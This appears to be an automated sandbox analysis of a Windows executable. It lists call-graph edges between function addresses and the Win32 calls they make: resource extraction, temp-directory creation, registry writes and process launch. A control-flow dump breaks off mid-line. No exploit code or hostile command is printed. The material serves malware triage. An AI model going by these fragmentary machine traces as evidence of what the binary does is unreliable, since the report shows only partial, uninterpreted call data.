7ff6975a6d12 2519->2521 2523 7ff6975a6d80 MulDiv 2520->2523 2524 7ff6975a6f63 memset 2520->2524 2522 7ff6975a4dcc 24 API calls 2521->2522 2525 7ff6975a6d2f 2522->2525 2523->2524 2527 7ff6975a6dae GetVolumeInformationA 2523->2527 2736 7ff6975a7700 GetLastError 2524->2736 2717 7ff6975a7700 GetLastError 2525->2717 2530 7ff6975a6e45 SetCurrentDirectoryA 2527->2530 2531 7ff6975a6de6 memset 2527->2531 2529 7ff6975a6f7b GetLastError FormatMessageA 2533 7ff6975a6fbd 2529->2533 2540 7ff6975a6e6c 2530->2540 2718 7ff6975a7700 GetLastError 2531->2718 2532 7ff6975a6d34 2536 7ff6975a6f41 2532->2536 2537 7ff6975a4dcc 24 API calls 2533->2537 2535 7ff6975a6dfe GetLastError FormatMessageA 2535->2533 2539 7ff6975a8470 7 API calls 2536->2539 2538 7ff6975a6fd8 SetCurrentDirectoryA 2537->2538 2538->2536 2541 7ff6975a326f 2539->2541 2542 7ff6975a6eb4 2540->2542 2544 7ff6975a6ed8 2540->2544 2541->2179 2541->2203 2543 7ff6975a4dcc 24 API calls 2542->2543 2543->2532 2544->2536 2719 7ff6975a24f8 2544->2719 2547 7ff6975a5050 7 API calls 2546->2547 2548 7ff6975a5dab FindResourceA LoadResource LockResource 2547->2548 2549 7ff6975a5dfc 2548->2549 2565 7ff6975a5fcf 2548->2565 2550 7ff6975a5e56 2549->2550 2551 7ff6975a5e08 GetDlgItem ShowWindow GetDlgItem ShowWindow 2549->2551 2737 7ff6975a5c60 #20 2550->2737 2551->2550 2554 7ff6975a5e5f 2557 7ff6975a4dcc 24 API calls 2554->2557 2555 7ff6975a5e69 #20 2555->2554 2556 7ff6975a5ed1 #22 2555->2556 2558 7ff6975a5f55 2556->2558 2559 7ff6975a5f15 #23 2556->2559 2560 7ff6975a5f53 2557->2560 2561 7ff6975a5f61 FreeResource 2558->2561 2562 7ff6975a5f75 2558->2562 2559->2554 2559->2558 2560->2558 2561->2562 2563 7ff6975a5f9f 2562->2563 2564 7ff6975a5f81 2562->2564 2563->2565 2567 7ff6975a5fb1 SendMessageA 2563->2567 2566 7ff6975a4dcc 24 API calls 2564->2566 2565->2199 2566->2563 2567->2565 2569 7ff6975a4118 2568->2569 2581 7ff6975a412f 2568->2581 2571 7ff6975a5050 7 API calls 2569->2571 2570 7ff6975a4145 memset 2570->2581 2571->2581 2572 7ff6975a4254 2574 7ff6975a4dcc 24 API calls 2572->2574 2573 7ff6975a5050 7 API calls 2573->2581 2610 7ff6975a4273 2574->2610 2575 7ff6975a44ee 2577 7ff6975a8470 7 API calls 2575->2577 2578 7ff6975a44ff 2577->2578 2578->2193 2579 7ff6975a42f5 CompareStringA 2580 7ff6975a45d8 2579->2580 2579->2581 2580->2575 2582 7ff6975a45f2 RegOpenKeyExA 2580->2582 2581->2570 2581->2572 2581->2573 2581->2575 2581->2579 2581->2580 2583 7ff6975a4599 2581->2583 2584 7ff6975a44df LocalFree 2581->2584 2594 7ff6975a41fd CompareStringA 2581->2594 2596 7ff6975a44ad LocalFree 2581->2596 2611 7ff6975a4394 2581->2611 2764 7ff6975a1684 2581->2764 2803 7ff6975a1d28 memset memset RegCreateKeyExA 2581->2803 2830 7ff6975a473c CreateProcessA 2581->2830 2582->2575 2585 7ff6975a4627 RegQueryValueExA 2582->2585 2587 7ff6975a4dcc 24 API calls 2583->2587 2584->2575 2589 7ff6975a471c RegCloseKey 2585->2589 2590 7ff6975a466c memset GetSystemDirectoryA 2585->2590 2591 7ff6975a45b8 LocalFree 2587->2591 2589->2575 2592 7ff6975a46b3 2590->2592 2593 7ff6975a469d 2590->2593 2591->2575 2598 7ff6975a114c _vsnprintf 2592->2598 2597 7ff6975a7ba8 CharPrevA 2593->2597 2594->2581 2596->2580 2596->2581 2597->2592 2599 7ff6975a46dc RegSetValueExA 2598->2599 2599->2589 2600 7ff6975a43a5 GetProcAddress 2602 7ff6975a4521 2600->2602 2600->2611 2601 7ff6975a4574 2603 7ff6975a4dcc 24 API calls 2601->2603 2604 7ff6975a4dcc 24 API calls 2602->2604 2606 7ff6975a4597 2603->2606 2607 7ff6975a4544 FreeLibrary 2604->2607 2608 7ff6975a4553 LocalFree 2606->2608 2607->2608 2855 7ff6975a7700 GetLastError 2608->2855 2610->2575 2611->2600 2611->2601 2612 7ff6975a4480 FreeLibrary 2611->2612 2613 7ff6975a44d3 FreeLibrary 2611->2613 2845 7ff6975a79f0 2611->2845 2612->2596 2613->2584 2615 7ff6975a5050 7 API calls 2614->2615 2616 7ff6975a3f8b LocalAlloc 2615->2616 2617 7ff6975a3fdd 2616->2617 2618 7ff6975a3fad 2616->2618 2619 7ff6975a5050 7 API calls 2617->2619 2620 7ff6975a4dcc 24 API calls 2618->2620 2621 7ff6975a3fef 2619->2621 2622 7ff6975a3fcb 2620->2622 2623 7ff6975a4030 lstrcmpA 2621->2623 2624 7ff6975a3ff3 2621->2624 2892 7ff6975a7700 GetLastError 2622->2892 2627 7ff6975a404e 2623->2627 2628 7ff6975a4098 LocalFree 2623->2628 2626 7ff6975a4dcc 24 API calls 2624->2626 2629 7ff6975a4011 LocalFree 2626->2629 2630 7ff6975a7ac8 28 API calls 2627->2630 2631 7ff6975a3139 2628->2631 2629->2631 2632 7ff6975a406e LocalFree 2630->2632 2631->2160 2631->2203 2632->2631 2633->2195 2641 7ff6975a778a 2634->2641 2635 7ff6975a114c _vsnprintf 2636 7ff6975a77df FindResourceA 2635->2636 2637 7ff6975a775e LoadResource LockResource 2636->2637 2638 7ff6975a7801 2636->2638 2637->2638 2637->2641 2639 7ff6975a8470 7 API calls 2638->2639 2640 7ff6975a782e 2639->2640 2640->2183 2641->2635 2642 7ff6975a7803 FreeResource 2641->2642 2643 7ff6975a77b8 FreeResource 2641->2643 2642->2638 2643->2641 2645 7ff6975a5050 7 API calls 2644->2645 2646 7ff6975a4967 LocalAlloc 2645->2646 2647 7ff6975a49a9 2646->2647 2648 7ff6975a4989 2646->2648 2650 7ff6975a5050 7 API calls 2647->2650 2649 7ff6975a4dcc 24 API calls 2648->2649 2651 7ff6975a49a7 2649->2651 2652 7ff6975a49bb 2650->2652 2651->2203 2653 7ff6975a49bf 2652->2653 2654 7ff6975a49d5 lstrcmpA 2652->2654 2656 7ff6975a4dcc 24 API calls 2653->2656 2654->2653 2655 7ff6975a4a0e LocalFree 2654->2655 2655->2651 2656->2655 2657->2455 2659 7ff6975a6516 2658->2659 2662 7ff6975a65dd 2658->2662 2689 7ff6975a63b8 2659->2689 2661 7ff6975a6688 2666 7ff6975a8470 7 API calls 2661->2666 2700 7ff6975a6b70 2662->2700 2667 7ff6975a66a8 2666->2667 2667->2486 2683 7ff6975a2468 GetWindowsDirectoryA 2667->2683 2668 7ff6975a6649 2668->2661 2675 7ff6975a6ca4 38 API calls 2668->2675 2669 7ff6975a662a CreateDirectoryA 2672 7ff6975a663f 2669->2672 2673 7ff6975a667d 2669->2673 2670 7ff6975a6577 GetSystemInfo 2680 7ff6975a6591 2670->2680 2671 7ff6975a65cc 2674 7ff6975a7ba8 CharPrevA 2671->2674 2672->2668 2712 7ff6975a7700 GetLastError 2673->2712 2674->2662 2678 7ff6975a665a 2675->2678 2677 7ff6975a7ba8 CharPrevA 2677->2671 2678->2661 2681 7ff6975a6666 RemoveDirectoryA 2678->2681 2679 7ff6975a6682 2679->2661 2680->2671 2680->2677 2681->2661 2682->2482 2684 7ff6975a24c4 2683->2684 2685 7ff6975a24a6 2683->2685 2687 7ff6975a8470 7 API calls 2684->2687 2686 7ff6975a4dcc 24 API calls 2685->2686 2686->2684 2688 7ff6975a24df 2687->2688 2688->2500 2688->2507 2693 7ff6975a63e3 2689->2693 2691 7ff6975a7ba8 CharPrevA 2692 7ff6975a6420 RemoveDirectoryA GetFileAttributesA 2691->2692 2692->2693 2694 7ff6975a64b6 CreateDirectoryA 2692->2694 2693->2691 2695 7ff6975a644b GetTempFileNameA 2693->2695 2713 7ff6975a114c 2693->2713 2694->2695 2696 7ff6975a6490 2694->2696 2695->2696 2697 7ff6975a646b DeleteFileA CreateDirectoryA 2695->2697 2698 7ff6975a8470 7 API calls 2696->2698 2697->2696 2699 7ff6975a64a2 2698->2699 2699->2661 2699->2670 2699->2671 2701 7ff6975a6b8b 2700->2701 2701->2701 2702 7ff6975a6b94 LocalAlloc 2701->2702 2703 7ff6975a6bf5 2702->2703 2704 7ff6975a6bb4 2702->2704 2706 7ff6975a7ba8 CharPrevA 2703->2706 2705 7ff6975a4dcc 24 API calls 2704->2705 2710 7ff6975a6bd2 2705->2710 2708 7ff6975a6c14 CreateFileA LocalFree 2706->2708 2709 7ff6975a6c61 CloseHandle GetFileAttributesA 2708->2709 2708->2710 2709->2710 2711 7ff6975a6626 2710->2711 2716 7ff6975a7700 GetLastError 2710->2716 2711->2668 2711->2669 2712->2679 2714 7ff6975a1178 _vsnprintf 2713->2714 2715 7ff6975a1199 2713->2715 2714->2715 2715->2693 2716->2711 2717->2532 2718->2535 2720 7ff6975a2562 2719->2720 2721 7ff6975a2525 2719->2721 2723 7ff6975a2567 2720->2723 2724 7ff6975a25ab 2720->2724 2722 7ff6975a114c _vsnprintf 2721->2722 2725 7ff6975a253d 2722->2725 2726 7ff6975a114c _vsnprintf 2723->2726 2727 7ff6975a255d 2724->2727 2731 7ff6975a114c _vsnprintf 2724->2731 2728 7ff6975a4dcc 24 API calls 2725->2728 2730 7ff6975a257f 2726->2730 2729 7ff6975a8470 7 API calls 2727->2729 2728->2727 2732 7ff6975a2609 2729->2732 2733 7ff6975a4dcc 24 API calls 2730->2733 2734 7ff6975a25c7 2731->2734 2732->2536 2733->2727 2735 7ff6975a4dcc 24 API calls 2734->2735 2735->2727 2736->2529 2738 7ff6975a5ced 2737->2738 2748 7ff6975a5d62 2737->2748 2749 7ff6975a5380 2738->2749 2740 7ff6975a8470 7 API calls 2742 7ff6975a5d78 2740->2742 2742->2554 2742->2555 2743 7ff6975a5d0d #21 2744 7ff6975a5d28 2743->2744 2743->2748 2744->2748 2761 7ff6975a5770 2744->2761 2747 7ff6975a5d4f #23 2747->2748 2748->2740 2750 7ff6975a53b3 2749->2750 2751 7ff6975a53d0 2750->2751 2752 7ff6975a53fd lstrcmpA 2750->2752 2753 7ff6975a4dcc 24 API calls 2751->2753 2754 7ff6975a53f4 2752->2754 2756 7ff6975a5454 2752->2756 2753->2754 2754->2743 2754->2748 2755 7ff6975a54a8 CreateFileA 2755->2754 2758 7ff6975a54de 2755->2758 2756->2754 2756->2755 2757 7ff6975a5561 CreateFileA 2757->2754 2758->2754 2758->2757 2759 7ff6975a5549 CharNextA 2758->2759 2760 7ff6975a5532 CreateDirectoryA 2758->2760 2759->2758 2760->2759 2762 7ff6975a57a4 CloseHandle 2761->2762 2763 7ff6975a578f 2761->2763 2762->2763 2763->2747 2763->2748 2765 7ff6975a16d3 2764->2765 2856 7ff6975a15e8 2765->2856 2768 7ff6975a7ba8 CharPrevA 2770 7ff6975a1766 2768->2770 2769 7ff6975a7d68 2 API calls 2771 7ff6975a1811 2769->2771 2770->2769 2772 7ff6975a1a1b 2771->2772 2773 7ff6975a181a CompareStringA 2771->2773 2774 7ff6975a7d68 2 API calls 2772->2774 2773->2772 2775 7ff6975a184d GetFileAttributesA 2773->2775 2776 7ff6975a1a28 2774->2776 2777 7ff6975a19f3 2775->2777 2778 7ff6975a1867 2775->2778 2779 7ff6975a1a31 CompareStringA 2776->2779 2780 7ff6975a1acb LocalAlloc 2776->2780 2782 7ff6975a4dcc 24 API calls 2777->2782 2778->2777 2781 7ff6975a15e8 2 API calls 2778->2781 2779->2780 2791 7ff6975a1a60 2779->2791 2780->2777 2783 7ff6975a1aeb GetFileAttributesA 2780->2783 2784 7ff6975a188b 2781->2784 2800 7ff6975a194f 2782->2800 2789 7ff6975a1b01 2783->2789 2785 7ff6975a18b5 LocalAlloc 2784->2785 2787 7ff6975a15e8 2 API calls 2784->2787 2785->2777 2788 7ff6975a18d7 GetPrivateProfileIntA GetPrivateProfileStringA 2785->2788 2786 7ff6975a1bd1 2790 7ff6975a8470 7 API calls 2786->2790 2787->2785 2792 7ff6975a1984 2788->2792 2788->2800 2802 7ff6975a1b54 2789->2802 2793 7ff6975a1be9 2790->2793 2791->2791 2794 7ff6975a1a81 LocalAlloc 2791->2794 2796 7ff6975a1995 GetShortPathNameA 2792->2796 2797 7ff6975a19ba 2792->2797 2793->2581 2794->2777 2798 7ff6975a1ab2 2794->2798 2796->2797 2801 7ff6975a114c _vsnprintf 2797->2801 2799 7ff6975a114c _vsnprintf 2798->2799 2799->2800 2800->2786 2801->2800 2864 7ff6975a2a6c 2802->2864 2804 7ff6975a2019 2803->2804 2809 7ff6975a1dce 2803->2809 2805 7ff6975a8470 7 API calls 2804->2805 2806 7ff6975a2028 2805->2806 2806->2581 2807 7ff6975a114c _vsnprintf 2808 7ff6975a1dee RegQueryValueExA 2807->2808 2808->2809 2810 7ff6975a1e25 2808->2810 2809->2807 2809->2810 2811 7ff6975a1e46 GetSystemDirectoryA 2810->2811 2812 7ff6975a1e29 RegCloseKey 2810->2812 2813 7ff6975a7ba8 CharPrevA 2811->2813 2812->2804 2814 7ff6975a1e6a LoadLibraryA 2813->2814 2815 7ff6975a1f55 GetModuleFileNameA 2814->2815 2816 7ff6975a1e86 GetProcAddress FreeLibrary 2814->2816 2817 7ff6975a1f78 RegCloseKey 2815->2817 2821 7ff6975a1ee8 2815->2821 2816->2815 2818 7ff6975a1ebe GetSystemDirectoryA 2816->2818 2817->2804 2819 7ff6975a1ed5 2818->2819 2818->2821 2820 7ff6975a7ba8 CharPrevA 2819->2820 2820->2821 2821->2821 2822 7ff6975a1f11 LocalAlloc 2821->2822 2823 7ff6975a1f8e 2822->2823 2824 7ff6975a1f35 2822->2824 2826 7ff6975a114c _vsnprintf 2823->2826 2825 7ff6975a4dcc 24 API calls 2824->2825 2827 7ff6975a1f53 2825->2827 2828 7ff6975a1fc4 2826->2828 2827->2817 2828->2828 2829 7ff6975a1fcd RegSetValueExA RegCloseKey LocalFree 2828->2829 2829->2804 2831 7ff6975a48b3 2830->2831 2832 7ff6975a47c2 WaitForSingleObject GetExitCodeProcess 2830->2832 2891 7ff6975a7700 GetLastError 2831->2891 2833 7ff6975a47f9 2832->2833 2836 7ff6975a482a CloseHandle CloseHandle 2833->2836 2840 7ff6975a2318 18 API calls 2833->2840 2835 7ff6975a48b8 GetLastError FormatMessageA 2838 7ff6975a4dcc 24 API calls 2835->2838 2839 7ff6975a491c 2836->2839 2841 7ff6975a48aa 2836->2841 2838->2839 2842 7ff6975a8470 7 API calls 2839->2842 2843 7ff6975a484d 2840->2843 2841->2839 2844 7ff6975a492f 2842->2844 2843->2836 2844->2581 2846 7ff6975a7a25 2845->2846 2847 7ff6975a7ba8 CharPrevA 2846->2847 2848 7ff6975a7a63 GetFileAttributesA 2847->2848 2849 7ff6975a7a96 LoadLibraryA 2848->2849 2850 7ff6975a7a79 2848->2850 2852 7ff6975a7aa9 2849->2852 2850->2849 2851 7ff6975a7a7d LoadLibraryExA 2850->2851 2851->2852 2853 7ff6975a8470 7 API calls 2852->2853 2854 7ff6975a7ab9 2853->2854 2854->2611 2855->2610 2858 7ff6975a1609 2856->2858 2859 7ff6975a1621 2858->2859 2860 7ff6975a1651 2858->2860 2877 7ff6975a7ce8 2858->2877 2861 7ff6975a7ce8 2 API calls 2859->2861 2860->2768 2860->2770 2862 7ff6975a162f 2861->2862 2862->2860 2863 7ff6975a7ce8 2 API calls 2862->2863 2863->2862 2865 7ff6975a2aa0 GetModuleFileNameA 2864->2865 2866 7ff6975a2c24 2864->2866 2865->2866 2876 7ff6975a2ac8 2865->2876 2867 7ff6975a8470 7 API calls 2866->2867 2868 7ff6975a2c37 2867->2868 2868->2786 2869 7ff6975a2acc IsDBCSLeadByte 2869->2876 2870 7ff6975a2af1 CharNextA CharUpperA 2872 7ff6975a2b9b CharUpperA 2870->2872 2870->2876 2871 7ff6975a2bf6 CharNextA 2873 7ff6975a2c08 CharNextA 2871->2873 2872->2876 2873->2866 2873->2869 2875 7ff6975a2b36 CharPrevA 2875->2876 2876->2869 2876->2870 2876->2871 2876->2873 2876->2875 2882 7ff6975a7c40 2876->2882 2880 7ff6975a7d00 2877->2880 2878 7ff6975a7d47 2878->2858 2879 7ff6975a7d0a IsDBCSLeadByte 2879->2878 2879->2880 2880->2878 2880->2879 2881 7ff6975a7d30 CharNextA 2880->2881 2881->2880 2883 7ff6975a7c58 2882->2883 2883->2883 2884 7ff6975a7c61 CharPrevA 2883->2884 2885 7ff6975a7c7d CharPrevA 2884->2885 2886 7ff6975a7c75 2885->2886 2887 7ff6975a7c94 2885->2887 2886->2885 2886->2887 2888 7ff6975a7cc7 2887->2888 2889 7ff6975a7c9e CharPrevA 2887->2889 2890 7ff6975a7cb5 CharNextA 2887->2890 2888->2876 2889->2888 2889->2890 2890->2888 2891->2835 2892->2631 2894 7ff6975a2281 2893->2894 2895 7ff6975a22eb 2893->2895 2897 7ff6975a7ba8 CharPrevA 2894->2897 2896 7ff6975a8470 7 API calls 2895->2896 2898 7ff6975a22fd 2896->2898 2899 7ff6975a2294 WritePrivateProfileStringA _lopen 2897->2899 2898->2225 2899->2895 2900 7ff6975a22c7 _llseek _lclose 2899->2900 2900->2895 2995 7ff6975a1500 2996 7ff6975a1530 2995->2996 2997 7ff6975a1557 GetDesktopWindow 2995->2997 3000 7ff6975a1542 EndDialog 2996->3000 3001 7ff6975a1553 2996->3001 2998 7ff6975a4c68 14 API calls 2997->2998 2999 7ff6975a156e LoadStringA SetDlgItemTextA MessageBeep 2998->2999 2999->3001 3000->3001 3002 7ff6975a8470 7 API calls 3001->3002 3003 7ff6975a15d0 3002->3003 3004 7ff6975a3840 3005 7ff6975a3852 3004->3005 3011 7ff6975a385a 3004->3011 3007 7ff6975a388e GetDesktopWindow 3005->3007 3005->3011 3006 7ff6975a38ec EndDialog 3008 7ff6975a385f 3006->3008 3009 7ff6975a4c68 14 API calls 3007->3009 3010 7ff6975a38a5 SetWindowTextA SetDlgItemTextA SetForegroundWindow 3009->3010 3010->3008 3011->3006 3011->3008 3019 7ff6975a8790 SetUnhandledExceptionFilter 3020 7ff6975a8750 3021 7ff6975a8782 3020->3021 3022 7ff6975a875f 3020->3022 3022->3021 3023 7ff6975a877b ?terminate@ 3022->3023 3023->3021 2942 7ff6975a3910 2943 7ff6975a3933 2942->2943 2944 7ff6975a3a09 2942->2944 2943->2944 2945 7ff6975a3a11 GetDesktopWindow 2943->2945 2946 7ff6975a3948 2943->2946 2947 7ff6975a3954 2944->2947 2948 7ff6975a3b1a EndDialog 2944->2948 2965 7ff6975a4c68 6 API calls 2945->2965 2950 7ff6975a397b 2946->2950 2951 7ff6975a394c 2946->2951 2948->2947 2950->2947 2954 7ff6975a3985 ResetEvent 2950->2954 2951->2947 2953 7ff6975a395b TerminateThread 2951->2953 2953->2948 2957 7ff6975a4dcc 24 API calls 2954->2957 2955 7ff6975a3a38 GetDlgItem SendMessageA GetDlgItem SendMessageA 2956 7ff6975a3a9b SetWindowTextA CreateThread 2955->2956 2956->2947 2958 7ff6975a3ae8 2956->2958 2959 7ff6975a39c3 2957->2959 2960 7ff6975a4dcc 24 API calls 2958->2960 2961 7ff6975a39e4 SetEvent 2959->2961 2963 7ff6975a39cc SetEvent 2959->2963 2962 7ff6975a3b07 2960->2962 2970 7ff6975a3b40 2961->2970 2962->2944 2963->2947 2966 7ff6975a4d3f SetWindowPos 2965->2966 2968 7ff6975a8470 7 API calls 2966->2968 2969 7ff6975a3a2f 2968->2969 2969->2955 2969->2956 2971 7ff6975a3b4c MsgWaitForMultipleObjects 2970->2971 2972 7ff6975a3be5 2971->2972 2973 7ff6975a3b74 PeekMessageA 2971->2973 2972->2944 2973->2971 2974 7ff6975a3b99 2973->2974 2974->2971 2974->2972 2975 7ff6975a3ba7 DispatchMessageA 2974->2975 2976 7ff6975a3bb8 PeekMessageA 2974->2976 2975->2976 2976->2974 2977 7ff6975a5690 2978 7ff6975a3b40 4 API calls 2977->2978 2979 7ff6975a56b1 2978->2979 2980 7ff6975a56c2 WriteFile 2979->2980 2981 7ff6975a56ba 2979->2981 2980->2981 2982 7ff6975a56f9 2980->2982 2982->2981 2983 7ff6975a5725 SendDlgItemMessageA 2982->2983 2983->2981 3100 7ff6975a80d0 3102 7ff6975a80e2 3100->3102 3107 7ff6975a8818 GetModuleHandleW 3102->3107 3103 7ff6975a8149 __set_app_type 3104 7ff6975a8186 3103->3104 3105 7ff6975a818f __setusermatherr 3104->3105 3106 7ff6975a819c 3104->3106 3105->3106 3108 7ff6975a882d 3107->3108 3108->3103

                                                          Callgraph

                                                          • Executed
                                                          • Not Executed
                                                          • Opacity -> Relevance
                                                          • Disassembly available
                                                          callgraph 0 Function_00007FF6975A33A0 1 Function_00007FF6975A6CA4 28 Function_00007FF6975A7700 1->28 35 Function_00007FF6975A24F8 1->35 54 Function_00007FF6975A8470 1->54 93 Function_00007FF6975A4DCC 1->93 2 Function_00007FF6975A60A4 2->28 85 Function_00007FF6975A5050 2->85 2->93 3 Function_00007FF6975A7024 4 Function_00007FF6975A8818 79 Function_00007FF6975A87BC 4->79 5 Function_00007FF6975A2318 77 Function_00007FF6975A2244 5->77 6 Function_00007FF6975A5B18 7 Function_00007FF6975A8417 8 Function_00007FF6975A8A9C 9 Function_00007FF6975A261C 22 Function_00007FF6975A7BA8 9->22 43 Function_00007FF6975A1008 9->43 9->54 10 Function_00007FF6975A81B0 11 Function_00007FF6975A8930 12 Function_00007FF6975A8B30 13 Function_00007FF6975A78B0 13->22 13->54 14 Function_00007FF6975A58B0 14->6 24 Function_00007FF6975A512C 14->24 27 Function_00007FF6975A5380 14->27 36 Function_00007FF6975A527C 14->36 14->54 56 Function_00007FF6975A5770 14->56 80 Function_00007FF6975A51BC 14->80 15 Function_00007FF6975A4A30 16 Function_00007FF6975A3530 16->1 16->22 46 Function_00007FF6975A4A60 16->46 57 Function_00007FF6975A6B70 16->57 63 Function_00007FF6975A4C68 16->63 16->93 17 Function_00007FF6975A2DB4 20 Function_00007FF6975A70A8 17->20 17->54 62 Function_00007FF6975A3BF4 17->62 71 Function_00007FF6975A12EC 17->71 17->85 89 Function_00007FF6975A7AC8 17->89 90 Function_00007FF6975A204C 17->90 17->93 18 Function_00007FF6975A7E34 19 Function_00007FF6975A2834 19->9 20->3 20->22 20->54 64 Function_00007FF6975A7D68 20->64 66 Function_00007FF6975A7CE8 20->66 88 Function_00007FF6975A8648 20->88 20->93 21 Function_00007FF6975A1D28 21->22 21->54 91 Function_00007FF6975A114C 21->91 21->93 33 Function_00007FF6975A1084 22->33 23 Function_00007FF6975A772C 23->54 23->91 24->33 24->43 25 Function_00007FF6975A8200 50 Function_00007FF6975A8964 25->50 83 Function_00007FF6975A88D0 25->83 87 Function_00007FF6975A2C54 25->87 26 Function_00007FF6975A8880 27->93 29 Function_00007FF6975A1500 29->54 29->63 30 Function_00007FF6975A7E00 31 Function_00007FF6975A8802 32 Function_00007FF6975A1684 32->22 32->33 32->43 32->54 32->64 67 Function_00007FF6975A15E8 32->67 70 Function_00007FF6975A2A6C 32->70 32->91 32->93 34 Function_00007FF6975A7F04 34->54 35->54 35->91 35->93 36->43 36->93 37 Function_00007FF6975A8790 38 Function_00007FF6975A8910 39 Function_00007FF6975A5690 74 Function_00007FF6975A3B40 39->74 40 Function_00007FF6975A5D90 47 Function_00007FF6975A5C60 40->47 40->85 40->93 41 Function_00007FF6975A3910 41->63 41->74 41->93 42 Function_00007FF6975A8494 44 Function_00007FF6975A1C0C 44->54 44->93 45 Function_00007FF6975A8B60 46->43 46->93 47->27 47->54 47->56 48 Function_00007FF6975A55E0 49 Function_00007FF6975A57E0 51 Function_00007FF6975A8A62 51->8 52 Function_00007FF6975A64E4 52->1 52->22 52->28 52->54 52->57 78 Function_00007FF6975A63B8 52->78 53 Function_00007FF6975A5FE4 53->23 53->85 53->93 54->42 55 Function_00007FF6975A8870 57->22 57->28 57->43 57->93 58 Function_00007FF6975A5870 59 Function_00007FF6975A33F0 59->63 60 Function_00007FF6975A79F0 60->22 60->54 61 Function_00007FF6975A3F74 61->28 61->85 61->89 61->93 62->18 62->19 62->34 62->54 62->93 63->54 65 Function_00007FF6975A2468 65->54 65->93 67->66 68 Function_00007FF6975A30EC 68->1 68->2 68->5 68->22 68->23 68->28 68->40 68->53 68->54 68->61 75 Function_00007FF6975A40C4 68->75 76 Function_00007FF6975A66C4 68->76 68->89 92 Function_00007FF6975A494C 68->92 68->93 69 Function_00007FF6975A61EC 69->54 72 Function_00007FF6975A7C40 69->72 69->90 70->43 70->54 70->72 71->54 94 Function_00007FF6975A11CC 71->94 73 Function_00007FF6975A3840 73->63 75->21 75->22 75->28 75->32 75->54 75->60 81 Function_00007FF6975A473C 75->81 75->85 75->91 75->93 76->1 76->22 76->28 76->52 76->54 76->65 76->85 76->89 76->93 77->22 77->54 78->22 78->43 78->54 78->91 80->89 81->5 81->28 81->54 81->93 82 Function_00007FF6975A8750 83->11 83->26 84 Function_00007FF6975A7850 86 Function_00007FF6975A80D0 86->4 86->55 87->5 87->17 87->44 87->68 87->69 87->93 88->42 89->93 90->22 90->33 90->54 90->90 92->85 92->93 93->18 93->34 93->43 93->54 93->91 94->54

                                                          Executed Functions

                                                          Function 00007FF6975A40C4 Relevance: 54.6, APIs: 17, Strings: 14, Instructions: 371libraryloaderCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 7ff6975a40c4-7ff6975a4116 1 7ff6975a4139-7ff6975a4141 0->1 2 7ff6975a4118-7ff6975a4133 call 7ff6975a5050 0->2 3 7ff6975a4145-7ff6975a4167 memset 1->3 2->1 8 7ff6975a4254-7ff6975a427d call 7ff6975a4dcc 2->8 6 7ff6975a4282-7ff6975a4295 3->6 7 7ff6975a416d-7ff6975a4188 call 7ff6975a5050 3->7 10 7ff6975a4299-7ff6975a42a3 6->10 7->8 17 7ff6975a418e-7ff6975a4194 7->17 23 7ff6975a44ee 8->23 11 7ff6975a42a5-7ff6975a42ab 10->11 12 7ff6975a42b7-7ff6975a42c2 10->12 11->12 15 7ff6975a42ad-7ff6975a42b5 11->15 16 7ff6975a42c5-7ff6975a42c8 12->16 15->10 15->12 19 7ff6975a4328-7ff6975a433d call 7ff6975a1684 16->19 20 7ff6975a42ca-7ff6975a42e2 call 7ff6975a5050 16->20 21 7ff6975a4196-7ff6975a419b 17->21 22 7ff6975a419d-7ff6975a41a0 17->22 19->23 37 7ff6975a4343-7ff6975a434a 19->37 20->8 36 7ff6975a42e8-7ff6975a42ef 20->36 26 7ff6975a41b5 21->26 27 7ff6975a41a2-7ff6975a41ab 22->27 28 7ff6975a41ad-7ff6975a41af 22->28 24 7ff6975a44f0-7ff6975a451f call 7ff6975a8470 23->24 33 7ff6975a41b8-7ff6975a41bb 26->33 27->26 32 7ff6975a41b1 28->32 28->33 32->26 33->16 38 7ff6975a41c1-7ff6975a41cb 33->38 39 7ff6975a42f5-7ff6975a4322 CompareStringA 36->39 40 7ff6975a45d8-7ff6975a45df 36->40 41 7ff6975a436a-7ff6975a436c 37->41 42 7ff6975a434c-7ff6975a4353 37->42 43 7ff6975a4231-7ff6975a4234 38->43 44 7ff6975a41cd-7ff6975a41d0 38->44 39->19 39->40 47 7ff6975a45e5-7ff6975a45ec 40->47 48 7ff6975a472d-7ff6975a472f 40->48 49 7ff6975a4493-7ff6975a449b 41->49 50 7ff6975a4372-7ff6975a4379 41->50 42->41 52 7ff6975a4355-7ff6975a435c 42->52 43->19 51 7ff6975a423a-7ff6975a4252 call 7ff6975a5050 43->51 45 7ff6975a41d2-7ff6975a41d9 44->45 46 7ff6975a41db-7ff6975a41dd 44->46 53 7ff6975a41ea-7ff6975a41fb call 7ff6975a5050 45->53 46->23 54 7ff6975a41e3 46->54 47->48 55 7ff6975a45f2-7ff6975a4621 RegOpenKeyExA 47->55 48->24 58 7ff6975a44df-7ff6975a44e9 LocalFree 49->58 59 7ff6975a449d-7ff6975a44a4 call 7ff6975a473c 49->59 56 7ff6975a437f-7ff6975a4381 50->56 57 7ff6975a4599-7ff6975a45d3 call 7ff6975a4dcc LocalFree 50->57 51->8 51->16 52->41 61 7ff6975a435e-7ff6975a4360 52->61 53->8 78 7ff6975a41fd-7ff6975a422d CompareStringA 53->78 54->53 55->48 63 7ff6975a4627-7ff6975a4666 RegQueryValueExA 55->63 56->49 65 7ff6975a4387-7ff6975a438e 56->65 57->23 58->23 74 7ff6975a44a9-7ff6975a44ab 59->74 61->50 62 7ff6975a4362-7ff6975a4365 call 7ff6975a1d28 61->62 62->41 70 7ff6975a471c-7ff6975a4728 RegCloseKey 63->70 71 7ff6975a466c-7ff6975a469b memset GetSystemDirectoryA 63->71 65->49 73 7ff6975a4394-7ff6975a439f call 7ff6975a79f0 65->73 70->48 76 7ff6975a46b3-7ff6975a46dc call 7ff6975a114c 71->76 77 7ff6975a469d-7ff6975a46ae call 7ff6975a7ba8 71->77 86 7ff6975a43a5-7ff6975a43c1 GetProcAddress 73->86 87 7ff6975a4574-7ff6975a4597 call 7ff6975a4dcc 73->87 74->58 80 7ff6975a44ad-7ff6975a44c3 LocalFree 74->80 88 7ff6975a46e3-7ff6975a46ea 76->88 77->76 78->43 80->40 84 7ff6975a44c9-7ff6975a44ce 80->84 84->3 89 7ff6975a4521-7ff6975a454e call 7ff6975a4dcc FreeLibrary 86->89 90 7ff6975a43c7-7ff6975a4415 86->90 100 7ff6975a4553-7ff6975a456f LocalFree call 7ff6975a7700 87->100 88->88 93 